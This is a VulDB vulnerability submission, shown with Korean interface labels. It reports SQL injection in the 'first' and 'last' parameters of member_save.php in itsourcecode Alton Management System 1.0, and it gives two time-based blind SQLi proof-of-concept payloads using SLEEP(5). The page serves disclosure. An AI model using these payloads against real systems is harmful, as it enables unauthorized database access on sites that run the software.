제출 #381094: itsourcecode Alton Management System 1.0 member_save.php정보

제목itsourcecode Alton Management System 1.0 member_save.php
설명Log in as an administrator user, access the "/admin/member_save.php" page. This page can pass in the "last" and "first" parameters, both of which can lead to SQL injection vulnerabilities due to lax filtering. -----------------POC------------------ Parameter: first (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: last=123&first=123' AND (SELECT 9651 FROM (SELECT(SLEEP(5)))LDVG) AND 'Zjoq'='Zjoq&contact=123&address=123 Parameter: last (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: last=123' AND (SELECT 9207 FROM (SELECT(SLEEP(5)))IyrR) AND 'YcaK'='YcaK&first=123&contact=123&address=123 -----------------------------------------
원천⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-4.md
사용자
 Dee.Mirage (UID 71702)
제출2024. 07. 27. PM 12:31 (2 연령 ago)
모더레이션2024. 07. 30. PM 03:29 (3 days later)
상태수락
VulDB 항목273145 [itsourcecode Alton Management System 1.0 /admin/member_save.php last/first SQL 주입]
포인트들20

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!